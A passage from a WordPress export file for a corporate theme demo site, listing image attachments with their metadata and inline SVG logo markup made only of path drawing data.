		<path class="st0" d="M53.1,20.7c-0.7,0-1.4,0-2-0.1s-1.4-0.1-2.1-0.3V8.3c0.6-0.1,1.2-0.2,1.9-0.2c0.7-0.1,1.3-0.1,1.9-0.1    c0.8,0,1.5,0.1,2.2,0.2c0.7,0.1,1.2,0.3,1.7,0.6c0.5,0.3,0.9,0.6,1.1,1.1c0.3,0.5,0.4,1,0.4,1.7c0,1-0.5,1.8-1.4,2.4    c0.8,0.3,1.3,0.7,1.6,1.2c0.3,0.5,0.4,1.1,0.4,1.7c0,1.3-0.5,2.3-1.4,3C56.4,20.4,55,20.7,53.1,20.7z M51.7,13h1.4    c0.9,0,1.5-0.1,1.9-0.3c0.4-0.2,0.6-0.6,0.6-1.1c0-0.5-0.2-0.9-0.6-1.1s-0.9-0.3-1.7-0.3c-0.2,0-0.5,0-0.8,0c-0.3,0-0.5,0-0.7,0    V13z M51.7,15.1v3.2c0.2,0,0.4,0,0.7,0.1c0.2,0,0.5,0,0.8,0c0.8,0,1.5-0.1,2-0.4s0.8-0.7,0.8-1.3c0-0.6-0.2-1-0.6-1.2    c-0.4-0.2-1-0.4-1.9-0.4H51.7z"></path>
		<path class="st0" d="M64.4,8.1c0.2,0.4,0.5,0.9,0.7,1.5c0.3,0.6,0.6,1.2,0.9,1.9c0.3,0.7,0.6,1.4,0.9,2.1s0.6,1.4,0.8,2    c0.3-0.6,0.5-1.3,0.8-2s0.6-1.4,0.9-2.1c0.3-0.7,0.6-1.3,0.9-1.9c0.3-0.6,0.5-1.1,0.7-1.5h2.6c0.1,0.8,0.2,1.8,0.3,2.8    c0.1,1,0.2,2.1,0.3,3.2c0.1,1.1,0.1,2.2,0.2,3.3c0.1,1.1,0.1,2.2,0.2,3.2H72c0-1.2-0.1-2.5-0.1-4c-0.1-1.4-0.2-2.9-0.3-4.3    c-0.2,0.5-0.5,1.1-0.7,1.7c-0.3,0.6-0.5,1.2-0.8,1.8c-0.3,0.6-0.5,1.2-0.7,1.8c-0.2,0.6-0.4,1-0.6,1.4h-2    c-0.2-0.4-0.4-0.9-0.6-1.4c-0.2-0.6-0.5-1.1-0.8-1.8c-0.3-0.6-0.5-1.2-0.8-1.8c-0.3-0.6-0.5-1.2-0.7-1.7c-0.1,1.5-0.2,2.9-0.3,4.3    c-0.1,1.4-0.1,2.7-0.1,4h-2.7c0-1,0.1-2,0.2-3.2c0.1-1.1,0.1-2.2,0.2-3.3c0.1-1.1,0.2-2.2,0.3-3.2c0.1-1,0.2-2,0.3-2.8H64.4z"></path>
		<path class="st0" d="M84.8,8.1c0.2,0.4,0.5,0.9,0.7,1.5c0.3,0.6,0.6,1.2,0.9,1.9c0.3,0.7,0.6,1.4,0.9,2.1s0.6,1.4,0.8,2    c0.3-0.6,0.5-1.3,0.8-2s0.6-1.4,0.9-2.1c0.3-0.7,0.6-1.3,0.9-1.9c0.3-0.6,0.5-1.1,0.7-1.5h2.6c0.1,0.8,0.2,1.8,0.3,2.8    c0.1,1,0.2,2.1,0.3,3.2c0.1,1.1,0.1,2.2,0.2,3.3c0.1,1.1,0.1,2.2,0.2,3.2h-2.7c0-1.2-0.1-2.5-0.1-4c-0.1-1.4-0.2-2.9-0.3-4.3    c-0.2,0.5-0.5,1.1-0.7,1.7c-0.3,0.6-0.5,1.2-0.8,1.8c-0.3,0.6-0.5,1.2-0.7,1.8c-0.2,0.6-0.4,1-0.6,1.4h-2    c-0.2-0.4-0.4-0.9-0.6-1.4c-0.2-0.6-0.5-1.1-0.8-1.8c-0.3-0.6-0.5-1.2-0.8-1.8c-0.3-0.6-0.5-1.2-0.7-1.7c-0.1,1.5-0.2,2.9-0.3,4.3    c-0.1,1.4-0.1,2.7-0.1,4h-2.7c0-1,0.1-2,0.2-3.2c0.1-1.1,0.1-2.2,0.2-3.3c0.1-1.1,0.2-2.2,0.3-3.2c0.1-1,0.2-2,0.3-2.8H84.8z"></path>
		<path class="st0" d="M97,15.9c0-0.8,0.1-1.6,0.4-2.2c0.3-0.6,0.6-1.2,1-1.6c0.4-0.4,0.9-0.7,1.4-1c0.5-0.2,1.1-0.3,1.7-0.3    c1.3,0,2.4,0.4,3.2,1.2c0.8,0.8,1.2,2,1.2,3.6c0,0.2,0,0.3,0,0.5c0,0.2,0,0.4,0,0.5h-6.1c0.1,0.6,0.3,1,0.8,1.3s1.1,0.5,1.8,0.5    c0.5,0,1,0,1.4-0.1c0.5-0.1,0.9-0.2,1.2-0.3l0.4,2.2c-0.1,0.1-0.3,0.1-0.6,0.2c-0.2,0.1-0.5,0.1-0.8,0.2c-0.3,0.1-0.6,0.1-0.9,0.1    s-0.7,0.1-1,0.1c-0.9,0-1.6-0.1-2.2-0.4s-1.2-0.6-1.6-1c-0.4-0.4-0.7-1-0.9-1.6C97.1,17.2,97,16.6,97,15.9z M103.3,14.9    c0-0.2-0.1-0.4-0.1-0.7c-0.1-0.2-0.2-0.4-0.3-0.6c-0.1-0.2-0.3-0.3-0.5-0.4c-0.2-0.1-0.5-0.2-0.8-0.2c-0.3,0-0.6,0.1-0.8,0.2    c-0.2,0.1-0.4,0.2-0.5,0.4c-0.1,0.2-0.3,0.4-0.3,0.6c-0.1,0.2-0.1,0.4-0.2,0.7H103.3z"></path>
		<path class="st0" d="M116.4,20.2c-0.2,0.1-0.5,0.1-0.8,0.2c-0.3,0.1-0.6,0.1-1,0.2c-0.3,0-0.7,0.1-1,0.1c-0.4,0-0.7,0-1,0    c-0.8,0-1.5-0.1-2.1-0.3c-0.6-0.2-1.1-0.6-1.5-1c-0.4-0.4-0.7-0.9-1-1.5c-0.2-0.6-0.3-1.3-0.3-2c0-0.8,0.1-1.5,0.3-2.1    c0.2-0.6,0.5-1.1,0.8-1.6c0.4-0.4,0.8-0.8,1.3-1c0.5-0.2,1.1-0.3,1.8-0.3c0.4,0,0.7,0,1,0.1c0.3,0.1,0.6,0.2,0.9,0.3V7l2.7-0.4    V20.2z M110.3,15.7c0,0.8,0.2,1.5,0.6,2s0.9,0.8,1.7,0.8c0.2,0,0.5,0,0.7,0c0.2,0,0.4,0,0.5-0.1v-4.9c-0.2-0.1-0.4-0.2-0.7-0.3    c-0.3-0.1-0.5-0.1-0.8-0.1C110.9,13.2,110.3,14,110.3,15.7z"></path>
		<path class="st0" d="M121.8,8.3c0,0.5-0.2,0.9-0.5,1.2s-0.7,0.4-1.1,0.4c-0.4,0-0.8-0.1-1.1-0.4s-0.5-0.7-0.5-1.2s0.2-0.9,0.5-1.2    c0.3-0.3,0.7-0.4,1.1-0.4c0.4,0,0.8,0.1,1.1,0.4C121.6,7.5,121.8,7.9,121.8,8.3z M121.6,20.6h-2.7v-9.5h2.7V20.6z"></path>
		<path class="st0" d="M127.5,10.8c0.8,0,1.5,0.1,2,0.3c0.5,0.2,1,0.4,1.3,0.8c0.3,0.3,0.5,0.7,0.7,1.2c0.1,0.5,0.2,1,0.2,1.6v5.6    c-0.4,0.1-0.9,0.2-1.6,0.3c-0.7,0.1-1.5,0.2-2.5,0.2c-0.6,0-1.2-0.1-1.7-0.2c-0.5-0.1-0.9-0.3-1.3-0.5s-0.6-0.6-0.8-1    c-0.2-0.4-0.3-0.9-0.3-1.5c0-0.6,0.1-1,0.3-1.4c0.2-0.4,0.5-0.7,0.9-0.9c0.4-0.2,0.8-0.4,1.3-0.5c0.5-0.1,1-0.2,1.5-0.2    c0.3,0,0.7,0,0.9,0c0.3,0,0.5,0.1,0.7,0.1v-0.3c0-0.5-0.1-0.8-0.4-1.1c-0.3-0.3-0.8-0.4-1.4-0.4c-0.5,0-0.9,0-1.4,0.1    c-0.4,0.1-0.8,0.2-1.2,0.3l-0.3-2.2c0.2,0,0.4-0.1,0.6-0.2c0.2-0.1,0.5-0.1,0.8-0.1c0.3,0,0.6-0.1,0.9-0.1    C126.9,10.8,127.2,10.8,127.5,10.8z M127.7,18.7c0.3,0,0.5,0,0.8,0s0.4,0,0.6-0.1v-2c-0.1,0-0.3,0-0.5-0.1c-0.2,0-0.4,0-0.6,0    c-0.3,0-0.5,0-0.7,0s-0.4,0.1-0.6,0.2s-0.3,0.2-0.4,0.3c-0.1,0.1-0.1,0.3-0.1,0.5c0,0.4,0.1,0.7,0.4,0.9S127.2,18.7,127.7,18.7z"></path>
	</g>
	<g>
		<g>
			<path class="st0" d="M5.5,6.5V0H4.8C2.2,0,0,2.2,0,4.8v1.7H5.5z"></path>
		</g>
		<g>
			<path class="st0" d="M25.1,8.4h4.8V4.8c0-2.6-2.1-4.8-4.8-4.8V8.4z"></path>
		</g>
		<g>
			<path class="st0" d="M21.6,25.1v4.7H25c2.6,0,4.8-2.1,4.8-4.7H21.6z"></path>
		</g>
		<g>
			<path class="st0" d="M6.7,23.8H0v-1.5h7.4c0.4,0,0.8,0.3,0.8,0.8v6.8h2.2v-9.4H6c-0.4,0-0.8-0.3-0.8-0.8V14     c-0.5-0.3-0.9-0.9-0.9-1.5c0-0.9,0.8-1.7,1.7-1.7c0.9,0,1.7,0.8,1.7,1.7c0,0.7-0.4,1.3-1,1.6V19h4.4c0.4,0,0.8,0.3,0.8,0.8v10.1     h3.4v-3.4c-0.6-0.3-1-0.9-1-1.6c0-0.9,0.8-1.7,1.7-1.7s1.7,0.8,1.7,1.7c0,0.7-0.4,1.2-0.9,1.5v3.4H20v-5.5c0-0.4,0.3-0.8,0.8-0.8     h9v-9.5h-3v4.7c0,0.4-0.3,0.8-0.8,0.8h-5.5c-0.3,0.6-0.9,1-1.6,1c-0.9,0-1.7-0.8-1.7-1.7c0-0.9,0.8-1.7,1.7-1.7     c0.7,0,1.2,0.4,1.5,0.9h4.8v-4.7c0-0.4,0.3-0.8,0.8-0.8h3.7V9.9h-5.5c-0.4,0-0.8-0.3-0.8-0.8V0h-8.2v2.7h5.1     c0.4,0,0.8,0.3,0.8,0.8v5.6c0.6,0.3,1,0.9,1,1.6c0,0.9-0.8,1.7-1.7,1.7c-0.9,0-1.7-0.8-1.7-1.7c0-0.7,0.4-1.2,0.9-1.5V4.2h-5.1     c-0.4,0-0.8-0.3-0.8-0.8V0h-3.7v5.6h3.1c0.4,0,0.8,0.3,0.8,0.8v7c0.6,0.3,1,0.9,1,1.6c0,0.9-0.8,1.7-1.7,1.7     c-0.9,0-1.7-0.8-1.7-1.7c0-0.6,0.4-1.2,0.9-1.5V7.1H9.4C9,7.1,8.6,6.7,8.6,6.3V0H7v7.2C7,7.7,6.7,8,6.3,8H0v17     c0,2.7,2.2,4.8,4.8,4.8h1.9V23.8z"></path>
		</g>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>03</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/about-us/attachment/03/</link>
		<pubDate>Tue, 08 Sep 2020 03:54:18 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/03.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>512</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 03:54:18]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 03:54:18]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[03]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/03.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/03.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 141.3 30" style="enable-background:new 0 0 141.3 30;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#FFFFFF;}
</style>
<g id="_x33_">
	<g>
		<path class="st0" d="M63.8,17.8c0,0.7-0.1,1.3-0.4,1.9c-0.2,0.6-0.6,1.1-1,1.5c-0.4,0.4-0.9,0.8-1.5,1c-0.6,0.2-1.2,0.4-1.9,0.4    c-0.7,0-1.4-0.1-2-0.4c-0.6-0.2-1.1-0.6-1.6-1c-0.4-0.4-0.8-0.9-1.1-1.5c-0.3-0.6-0.4-1.2-0.4-1.9c0-0.7,0.1-1.3,0.4-1.9    c0.3-0.6,0.6-1.1,1-1.5c0.4-0.4,1-0.8,1.6-1c0.6-0.2,1.3-0.4,1.9-0.4c0.8,0,1.5,0.2,2.2,0.5c0.7,0.3,1.3,0.8,1.7,1.3l-1.6,1.4    c-0.3-0.4-0.7-0.7-1-0.9s-0.8-0.3-1.3-0.3c-0.4,0-0.7,0.1-1,0.2c-0.3,0.1-0.6,0.3-0.8,0.6s-0.4,0.5-0.5,0.9    c-0.1,0.3-0.2,0.7-0.2,1.1c0,0.4,0.1,0.8,0.2,1.1c0.1,0.3,0.3,0.6,0.6,0.9s0.5,0.4,0.8,0.6c0.3,0.1,0.7,0.2,1.1,0.2    c0.5,0,1-0.1,1.4-0.4c0.4-0.3,0.7-0.6,0.8-1.1h-2.5v-2h5V17.8z"></path>
		<path class="st0" d="M65,22.5v-9.3h4.8c0.5,0,0.9,0.1,1.3,0.2c0.4,0.1,0.7,0.4,1,0.6c0.3,0.3,0.5,0.6,0.7,0.9    c0.2,0.4,0.2,0.8,0.2,1.2c0,0.6-0.2,1.1-0.5,1.6c-0.3,0.5-0.7,0.8-1.3,1.1l2,3.7h-2.6L69,19.1h-1.7v3.4H65z M69.6,15.1h-2.3v2.1    h2.3c0.4,0,0.6-0.1,0.9-0.3c0.2-0.2,0.3-0.4,0.3-0.8c0-0.3-0.1-0.6-0.3-0.8C70.2,15.2,69.9,15.1,69.6,15.1z"></path>
		<path class="st0" d="M74.2,22.5v-9.3h7.3v2h-5.1v1.7h3.3v1.9h-3.3v1.8h5.1v2H74.2z"></path>
		<path class="st0" d="M83,22.5v-9.3h7.3v2h-5.1v1.7h3.3v1.9h-3.3v1.8h5.1v2H83z"></path>
		<path class="st0" d="M91.7,13.2h2.2l4.2,5.4v-5.4h2.2v9.3h-2l-4.4-5.6v5.6h-2.2V13.2z"></path>
		<path class="st0" d="M104.4,22.5v-9.3h2.3v3.6h3.8v-3.6h2.3v9.3h-2.3v-3.6h-3.8v3.6H104.4z"></path>
		<path class="st0" d="M123.9,17.8c0,0.7-0.1,1.3-0.4,1.9c-0.3,0.6-0.6,1.1-1.1,1.5c-0.4,0.4-1,0.8-1.6,1c-0.6,0.2-1.3,0.4-2,0.4    c-0.7,0-1.3-0.1-2-0.4c-0.6-0.2-1.1-0.6-1.6-1c-0.4-0.4-0.8-0.9-1-1.5c-0.3-0.6-0.4-1.2-0.4-1.9c0-0.7,0.1-1.3,0.4-1.9    c0.3-0.6,0.6-1.1,1-1.5c0.4-0.4,1-0.8,1.6-1c0.6-0.2,1.3-0.4,2-0.4c0.7,0,1.3,0.1,2,0.4c0.6,0.2,1.1,0.6,1.6,1    c0.4,0.4,0.8,0.9,1.1,1.5C123.8,16.5,123.9,17.2,123.9,17.8z M121.6,17.8c0-0.4-0.1-0.7-0.2-1.1c-0.1-0.3-0.3-0.6-0.6-0.9    s-0.5-0.4-0.8-0.6c-0.3-0.1-0.7-0.2-1-0.2c-0.4,0-0.7,0.1-1,0.2c-0.3,0.1-0.6,0.3-0.8,0.6c-0.2,0.2-0.4,0.5-0.6,0.9    c-0.1,0.3-0.2,0.7-0.2,1.1c0,0.4,0.1,0.7,0.2,1.1c0.1,0.3,0.3,0.6,0.6,0.9c0.2,0.2,0.5,0.4,0.8,0.6c0.3,0.1,0.7,0.2,1,0.2    c0.4,0,0.7-0.1,1-0.2c0.3-0.1,0.6-0.3,0.8-0.6c0.2-0.2,0.4-0.5,0.6-0.9C121.5,18.6,121.6,18.2,121.6,17.8z"></path>
		<path class="st0" d="M124.4,21.1l1.3-1.7c0.6,0.5,1.1,0.8,1.6,1c0.5,0.2,1,0.3,1.5,0.3c0.5,0,0.9-0.1,1.2-0.2    c0.3-0.2,0.4-0.4,0.4-0.7c0-0.3-0.1-0.5-0.3-0.6c-0.2-0.1-0.5-0.3-1-0.3l-2-0.4c-0.8-0.1-1.3-0.4-1.7-0.9c-0.4-0.4-0.6-1-0.6-1.7    c0-0.9,0.3-1.6,1-2.1c0.7-0.5,1.6-0.8,2.8-0.8c0.7,0,1.4,0.1,2.1,0.4c0.7,0.2,1.3,0.6,1.8,1l-1.2,1.7c-0.5-0.4-1-0.7-1.4-0.8    c-0.5-0.2-0.9-0.3-1.4-0.3c-0.5,0-0.8,0.1-1.1,0.2c-0.3,0.1-0.4,0.3-0.4,0.6c0,0.2,0.1,0.4,0.3,0.5c0.2,0.1,0.5,0.2,0.8,0.3    l1.9,0.3c0.9,0.1,1.6,0.4,2,0.9c0.5,0.5,0.7,1,0.7,1.8c0,0.9-0.4,1.7-1.1,2.2c-0.7,0.5-1.7,0.8-3,0.8c-0.7,0-1.5-0.1-2.2-0.4    C125.6,21.9,125,21.6,124.4,21.1z"></path>
		<path class="st0" d="M132.9,15.2v-2h8.4v2h-3v7.3H136v-7.3H132.9z"></path>
	</g>
	<path class="st0" d="M25.3,19.9c2.1,0,3.9-1.7,3.9-3.9s-1.7-3.9-3.9-3.9s-3.9,1.7-3.9,3.9S23.2,19.9,25.3,19.9z M13.9,23.1   c-1.4,0-2.5,1.1-2.5,2.5c0,1.4,1.1,2.5,2.5,2.5c1.4,0,2.5-1.1,2.5-2.5C16.5,24.2,15.3,23.1,13.9,23.1z M33.5,25.3   c-1,0-1.8,0.8-1.8,1.8s0.8,1.8,1.8,1.8c1,0,1.8-0.8,1.8-1.8S34.5,25.3,33.5,25.3z M43.8,16.3c-0.2-2.9-2.6-5.3-5.5-5.5   c-2.7-0.2-5,1.4-6,3.6l0,0c0,0,0,0,0,0l-1.7,4.1c-0.8,2-2.5,3.5-4.5,4.2h0c-1.4,0.5-3,0.1-4.1-0.9c-0.4-0.4-0.8-0.8-0.8-0.8   c-0.9-0.8-1.5-1.9-1.7-3.1c-0.1-0.4-0.1-0.8-0.1-1.2l0.2-4.5l0.1-2.1l0,0c0-0.1,0-0.1,0-0.2c0-5.7-4.8-10.2-10.5-9.8   C4.3,0.4,0.4,4.3,0,9.1C0,10,0,10.8,0.2,11.6c0.8,4.6,4.8,8,9.7,8c0.2,0,4.3,0.3,5.9,1.2l1.1,0.6c1.1,0.6,1.9,1.6,2.4,2.7l1.4,3.4   l0,0c0.4,1.4,1.6,2.5,3.2,2.5c1,0,2-0.5,2.6-1.2c0.5-0.6,4.1-4.2,4.1-4.2c0.8-0.9,2-1.4,3.2-1.5l4.8-0.3c2.5-0.2,4.5-1.9,5.3-4.2   c0.2-0.6,0.3-1.2,0.3-1.8C43.8,16.6,43.8,16.4,43.8,16.3z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>04</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/about-us/attachment/04/</link>
		<pubDate>Tue, 08 Sep 2020 03:54:19 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/04.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>513</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 03:54:19]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 03:54:19]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[04]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/04.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/04.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 88.4 30.4" style="enable-background:new 0 0 88.4 30.4;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#FFFFFF;}
</style>
<g id="_x34_">
	<path class="st0" d="M21.9,6c1.2,1,2.8,1.5,4.6,1.4c0.6,0,1.2-0.1,1.9-0.2c-1.2-1.9-2.8-3.6-4.8-4.9c-1.9-1.2-3.9-1.9-5.9-2.2   l1.8,2.8C20.1,4,20.9,5.2,21.9,6z M5.5,18.4C6.2,17.2,6.9,16,7,14.7c0.1-1-0.3-2.1-0.7-3.2L6,10.4C5.4,8.9,4.7,7.4,4.1,6   C4,5.8,3.9,5.7,3.9,5.6c0-0.1-0.1-0.1-0.1-0.2c0-0.1-0.1-0.2-0.1-0.2C3.2,5.7,2.8,6.2,2.4,6.8c-3.7,5.8-3,13,1.1,18   c-0.1-1.3,0.1-2.6,0.6-3.8C4.5,20.1,5,19.3,5.5,18.4z M30.1,18.9c0,0-0.1,0-0.1,0c-0.2,0-0.4,0-0.6,0c-0.1,0-0.2,0-0.2,0   c-1.4,0.2-2.6,0.5-3.7,1.1c-1.4,0.9-2.2,2.5-2.1,4.1c0,0.5,0.1,0.9,0.2,1.4c0.1,0.7,0.3,1.4,0.3,2.1c1.7-1.1,3.1-2.6,4.3-4.4   C29,21.9,29.7,20.4,30.1,18.9z M29.3,16.6c0.4-0.1,0.8-0.2,1.2-0.2c0.1-1.5,0-3-0.3-4.5c-0.2,0-0.4,0.1-0.5,0.1   c-0.9,0.2-1.8,0.5-2.7,0.9c-0.5,0.2-1,0.4-1.4,0.5c-1.3,0.4-3.2,0.9-5.1,0.5c-0.7-0.2-1.3-0.4-1.9-0.8c-1.1-0.7-2-1.8-2.5-3   c-0.4-1.1-0.5-2.2-0.6-3.3c0-0.6-0.1-1.1-0.2-1.6c-0.1-0.9-0.4-1.8-0.9-2.7c-0.5-1-1-1.7-1.5-2.3C10.9,0.3,9,1,7.3,2   C7.2,2.4,7,2.7,7,3C6.7,4.8,8,6.6,9,7.8C9.1,8,9.2,8.2,9.4,8.3c1.3,1.5,2.7,3.3,3,5.5c0.3,2.3-0.6,4.3-1.4,6.2   c-0.7,1.5-1.3,2.9-1.3,4.4c0,1.7,0.9,3.5,2.5,5c0.3,0.3,0.7,0.6,1.1,0.9c0.9,0.1,1.8,0.2,2.7,0.1c0.4-0.3,0.8-0.5,1.1-0.9   c0.8-1,1-2.4,1.1-3.8c0-0.2,0-0.4,0-0.6c0.1-1.5,0.1-3,0.8-4.5c0.8-1.7,2.3-3.1,4-3.6c1.3-0.4,2.7-0.4,4.1-0.4l0.1,0   c0.7,0,1.4,0.1,2,0C29.2,16.6,29.3,16.6,29.3,16.6z"></path>
	<g>
		<path class="st0" d="M48.2,15.5v4.9h-2.4v-4.9l-3.8-7.8h2.5l2.4,5.5l2.4-5.5H52L48.2,15.5z"></path>
		<path class="st0" d="M53.5,20.1c-0.6-0.3-1-0.8-1.3-1.4c-0.3-0.6-0.5-1.3-0.5-2.1v-1.5c0-0.8,0.2-1.5,0.5-2.1    c0.3-0.6,0.8-1,1.3-1.3c0.6-0.3,1.3-0.5,2.1-0.5s1.5,0.2,2.1,0.5c0.6,0.3,1,0.8,1.3,1.3c0.3,0.6,0.5,1.3,0.5,2.1v1.5    c0,0.8-0.2,1.5-0.5,2.1c-0.3,0.6-0.8,1-1.3,1.3c-0.6,0.3-1.3,0.5-2.1,0.5S54.1,20.4,53.5,20.1z M56.8,17.8    c0.3-0.3,0.4-0.7,0.4-1.2v-1.5c0-0.5-0.1-0.9-0.4-1.2s-0.6-0.4-1.1-0.4c-0.5,0-0.9,0.1-1.1,0.4c-0.3,0.3-0.4,0.7-0.4,1.2v1.5    c0,0.5,0.1,0.9,0.4,1.2c0.3,0.3,0.6,0.4,1.1,0.4S56.5,18.1,56.8,17.8z"></path>
		<path class="st0" d="M63,20.1c-0.5-0.3-0.8-0.8-1-1.3c-0.2-0.6-0.4-1.3-0.4-2.1v-1.5c0-0.8,0.1-1.6,0.4-2.2s0.6-1.1,1-1.4    s1-0.5,1.7-0.5c0.5,0,0.9,0.1,1.3,0.4c0.4,0.3,0.7,0.7,1,1.2l-0.2,2c0-0.3-0.1-0.6-0.2-0.8s-0.3-0.4-0.5-0.5    c-0.2-0.1-0.4-0.2-0.7-0.2c-0.5,0-0.8,0.2-1.1,0.5c-0.2,0.3-0.4,0.7-0.4,1.3v1.5c0,0.5,0.1,1,0.4,1.3s0.6,0.4,1.1,0.4    c0.3,0,0.5-0.1,0.7-0.2c0.2-0.1,0.4-0.3,0.5-0.5s0.2-0.5,0.2-0.8l0.1,2.1c-0.2,0.5-0.5,0.9-0.9,1.2c-0.4,0.3-0.8,0.4-1.4,0.4    C64,20.6,63.4,20.4,63,20.1z M66.7,7.7h2.4v12.8h-2.4V7.7z"></path>
		<path class="st0" d="M72.7,20.1c-0.5-0.3-0.8-0.8-1-1.3c-0.2-0.6-0.4-1.3-0.4-2.1v-1.5c0-0.8,0.1-1.6,0.4-2.2s0.6-1.1,1-1.4    s1-0.5,1.7-0.5c0.5,0,0.9,0.1,1.3,0.4c0.4,0.3,0.7,0.7,1,1.2l-0.2,2c0-0.3-0.1-0.6-0.2-0.8s-0.3-0.4-0.5-0.5    c-0.2-0.1-0.4-0.2-0.7-0.2c-0.5,0-0.8,0.2-1.1,0.5c-0.2,0.3-0.4,0.7-0.4,1.3v1.5c0,0.5,0.1,1,0.4,1.3s0.6,0.4,1.1,0.4    c0.3,0,0.5-0.1,0.7-0.2c0.2-0.1,0.4-0.3,0.5-0.5s0.2-0.5,0.2-0.8l0.1,2.1c-0.2,0.5-0.5,0.9-0.9,1.2c-0.4,0.3-0.8,0.4-1.4,0.4    C73.7,20.6,73.1,20.4,72.7,20.1z M73.7,24.2c0,0-0.3-0.1-0.9-0.4c-0.6-0.3-1-0.6-1.3-1.1l1.6-1.5c0.2,0.2,0.5,0.4,0.7,0.5    c0.3,0.1,0.6,0.2,0.9,0.2c0.5,0,0.9-0.1,1.2-0.4c0.3-0.3,0.5-0.7,0.5-1.1v-9h2.4v8.9c0,0.8-0.2,1.6-0.5,2.2    c-0.3,0.6-0.8,1.1-1.4,1.4s-1.4,0.5-2.2,0.5C74,24.2,73.7,24.2,73.7,24.2z"></path>
		<path class="st0" d="M80,11.3h2.3l3.1,7.9l-1.5,1.9L80,11.3z M88.4,11.3l-4.1,11.3c-0.2,0.4-0.3,0.7-0.6,1    c-0.2,0.2-0.5,0.4-0.8,0.5c-0.3,0.1-0.7,0.2-1.2,0.2h-0.5v-2.3h0.5c0.3,0,0.5-0.1,0.6-0.2c0.2-0.1,0.3-0.3,0.4-0.6l3.4-9.9H88.4z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>05</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/about-us/attachment/05/</link>
		<pubDate>Tue, 08 Sep 2020 03:54:20 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/05.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>514</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 03:54:20]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 03:54:20]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[05]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/05.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/05.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
